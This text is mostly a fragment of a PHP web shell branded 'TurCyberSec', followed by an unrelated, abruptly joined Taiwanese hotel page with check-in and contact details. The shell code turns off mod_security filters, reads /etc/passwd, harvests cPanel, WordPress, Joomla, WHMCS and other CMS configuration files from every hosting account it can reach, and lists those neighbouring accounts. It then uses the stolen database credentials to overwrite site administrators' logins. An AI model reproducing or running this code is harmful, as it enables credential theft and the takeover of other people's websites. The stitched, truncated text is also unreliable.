SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>"; file_put_contents('.htaccess', $ht); echo "<font color='green'>Successful</font>"; echo "</center>"; } } elseif($_GET['do'] == 'bckup') { function rmdir_recursive($dir) { foreach(scandir($dir) as $file) { if('.' === $file || '..' === $file) continue; if(is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach($accepted_types as $mime_type) { if($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if(!$continue) { $message = "Salah tolo"; } $path = dirname(__FILE__).'/'; $filenoext = basename ($filename, '.zip'); $filenoext = basename ($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive ( $targetdir); mkdir($targetdir, 0777); if(move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "<b>Successful</b>"; } else { $message = "<b>Error</b>"; } } echo "<center><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' 
style='width: 215px;'></form></center>"; if($_POST['backup']){ $save=$_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'],$save); echo "<center>Done , Save To <b>$save</b></center>"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>"); $tg = mkdir("TurCyberSec_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("TurCyberSec_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_tg) { $user_config_dir = "/home/$user_tg/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_tg/.my.cnf" => "cpanel", "/home/$user_tg/.accesshash" => "WHM-accesshash", "/home/$user_tg/public_html/po-content/config.php" => "Popoji", "/home/$user_tg/public_html/vdo_config.php" => "Voodoo", "/home/$user_tg/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_tg/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_tg/public_html/lokomedia/config/koneksi.php" 
=> "Lokomedia", "/home/$user_tg/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whm/configuration.php" => "WHMCS", "/home/$user_tg/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_tg/public_html/forum/config.php" => "phpBB", "/home/$user_tg/public_html/sites/default/settings.php" => "Drupal", "/home/$user_tg/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_tg/public_html/app/etc/local.xml" => "Magento", "/home/$user_tg/public_html/joomla/configuration.php" => "Joomla", "/home/$user_tg/public_html/configuration.php" => "Joomla", "/home/$user_tg/public_html/wp/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_tg/public_html/wp-config.php" => "WordPress", "/home/$user_tg/public_html/admin/config.php" => "OpenCart", "/home/$user_tg/public_html/slconfig.php" => "Sitelok", "/home/$user_tg/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("TurCyberSec_config/$user_tg-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "<center><a href='?dir=$dir/TurCyberSec_config'><font color=lime>Done</font></a></center>"; } elseif($_GET['do'] == 'jumping') { $i = 0; echo "<div class='margin: 5px auto;'>"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "<pre>"; foreach($urls as $url) { $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; 
if(is_writable($url_user)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>"; } echo $jrw."<br>"; } } } } if($i == 0) { } else { echo "<br>Total ada ".$i." Kamar di ".$ip; } echo "</pre>"; } else { echo '<center>
  <form method="post">
  List Domains: <br>
  <textarea name="url" style="width: 500px; height: 250px;">'; $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r"); while($getss = fgets($fp)) { echo $getss; } echo '</textarea><br>
  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  </form></center>'; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "<pre>"; foreach($urls as $url) { $web_vh = "/var/www/vhosts/$url/httpdocs"; if(is_dir($web_vh) === true) { if(is_readable($web_vh)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; if(is_writable($web_vh)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>"; } echo $jrw."<br>"; } } } if($i == 0) { } else { echo "<br>Total ada ".$i." Kamar di ".$ip; } echo "</pre>"; } else { echo '<center>
  <form method="post">
  List Domains: <br>
  <textarea name="url" style="width: 500px; height: 250px;">'; bing("ip:$ip"); echo '</textarea><br>
  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  </form></center>'; } } else { echo "<pre>"; $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_tg_jump) { $user_jumping_dir = "/home/$user_tg_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; if(is_writable($user_jumping_dir)) { $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_tg_jump) { echo " => ( <u>$dj</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if($i == 0) { } else { echo "<br>Total ada ".$i." 
Kamar di ".$ip; } echo "</pre>"; } echo "</div>"; } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Joomla<br>"; if($site == '') { echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>"; } else { echo "Sitename => $site<br>"; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix  = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = 
mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Wordpress<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>"); $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>"); $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>"); $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>"); $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>"); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target/admin/' 
target='_blank'><u>$target/admin/</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Magento<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."<br>"; echo "CMS => OpenCart<br>"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = 
ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; if($target2 == '') { $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>"; } else { $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."<br>"; echo "CMS => Lokomedia<br>"; 
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => <font color=red>".mysql_error()."</font><br><br>"; } else { echo "Status => <font color=lime>Successful edit user, please login with user & pass the new one.</font><br><br>"; } mysql_close($conn); } } } } else { echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='TurCyberSec' placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='TurCyberSec' placeholder='pass_baru'><br>
<input type='sub

帝豪飯店

帝豪飯店以全新的裝潢、精緻溫馨的格局、舒適整潔的空間,
以及交通便利的優質環境,提供房客新的旅遊、出差住房據點。


Contact Us

高雄市三民區安寧街387號
+886-7-9723788

入住說明(1)

進房時間(Check-in):PM 15:00;
最晚保留時間(Latest time the room will be held):PM 18:00
退房時間(Check-out):AM 12:00之前
平日定義:週日~週五;假日定義:週六、特別假日、寒暑假期、連續假日
住房附贈自助式中/西式早餐,素食者可用(用餐時間:6:30AM~9:00AM)
 


入住說明(2)

加人服務:每人NT$600元,費用內含:早餐、備品
客房內提供有線全頻道/無線電視觀看
現場提供刷卡服務,卡別:VISA、Master
全館禁止寵物進入   提供免費晨報    全館禁煙
※國民旅遊卡特約商店
